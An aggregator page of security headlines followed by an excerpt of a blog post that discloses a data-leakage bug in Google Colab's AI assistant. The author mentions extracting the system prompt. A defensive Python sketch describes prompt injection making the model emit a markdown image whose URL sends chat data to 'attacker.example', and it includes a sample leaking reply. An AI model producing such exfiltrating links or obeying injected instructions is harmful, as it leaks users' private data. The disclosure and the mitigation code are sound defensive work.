Aggregator
Google Abandons Plan to Phase Out Third-Party Cookies, Leaving the Choice to Users
Exploring AI Security in Multi-Unmanned-System Collaboration
City Heating System Shut Down by Cyberattack, Leaving Many Residents Without Heat for Nearly 2 Days in Midwinter
Research and Practice on a Software Security Development Maturity Model
Report Release | 数世咨询: Xinchuang (信创) Security Market Guide (download available)
On a Rampage! Who Says the "Microsoft Blue Screen" Doesn't Affect You? (Part 2)
From the Google–Wiz Acquisition Saga: A Look at the Evolution of Cloud Security Posture Management (CSPM)
See Malicious Process Relationships on a Visual Graph
At ANY.RUN, we’re all about making in-depth technical information accessible. One of the ways we do this is by providing you with various detailed, yet easy-to-understand reports on malware behavior. One such report is the Process graph. What is the Process graph? The Process graph is a report that visually shows how system processes, especially malicious ones, relate […]
The post See Malicious Process Relationships on a Visual Graph appeared first on ANY.RUN's Cybersecurity Blog.
How Many Nuclear Weapons Does the US Have in 2024?
12 Ways to Quickly Break a Person Down During Interrogation
Conference Talk Preview | A Journey into Windows Remote File Protocol Vulnerability Hunting
Patchwork Hacker Group Targets Chinese Science and Technology Universities to Steal Core Data!
Vector Search with 95% Fewer Resources | DiskANN on Cloud Search
A Roundup of Large Language Model Applications in Cybersecurity
Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins
CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software
New Chrome Feature Scans Password-Protected Files for Malicious Content
Google Colab AI: Data Leakage Through Image Rendering Fixed. Some Risks Remain.
Google Colab AI, now just called Gemini in Colab, was vulnerable to data leakage via image rendering.
This is an older bug report, dating back to November 29, 2023. However, recent events prompted me to write this up:
- Google did not reward this finding, and
- Colab now automatically puts Notebook content (untrusted data) into the prompt.
Let’s explore the specifics.
Google Colab AI - Revealing the System Prompt

At the end of November last year, I noticed that there was a “Colab AI” feature, which integrated an LLM to chat with and write code. Naturally, I grabbed the system prompt, and it contained instructions that begged the LLM to not render images.
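To illustrate why image rendering matters here: a prompt injection can make the model emit a markdown image whose URL carries chat data, and the client exfiltrates that data the moment it fetches the image. Below is a minimal, hypothetical sketch of a client-side mitigation that strips external image references from model output before rendering; the `ALLOWED_HOSTS` allow-list and function names are illustrative assumptions, not Google's actual fix.

```python
import re

# Markdown image syntax: ![alt](url). An injected instruction can make the
# model emit ![x](https://attacker.example/leak?q=<chat data>), leaking data
# when the client fetches the image.
IMG_PATTERN = re.compile(r'!\[[^\]]*\]\(\s*(https?://[^)\s]+)[^)]*\)')

ALLOWED_HOSTS = {"colab.research.google.com"}  # hypothetical allow-list

def strip_untrusted_images(markdown: str) -> str:
    """Replace external image references with a plain-text placeholder."""
    def repl(m: re.Match) -> str:
        host = m.group(1).split("/")[2]  # scheme://HOST/path
        if host in ALLOWED_HOSTS:
            return m.group(0)  # keep images from trusted hosts
        return "[image blocked]"
    return IMG_PATTERN.sub(repl, markdown)

reply = "Summary: ![p](https://attacker.example/leak?q=SECRET_TOKEN)"
print(strip_untrusted_images(reply))  # → Summary: [image blocked]
```

Blocking the fetch, rather than asking the model nicely in the system prompt, is the robust end of the fix: the model's output is untrusted, so the sanitization has to happen in the renderer.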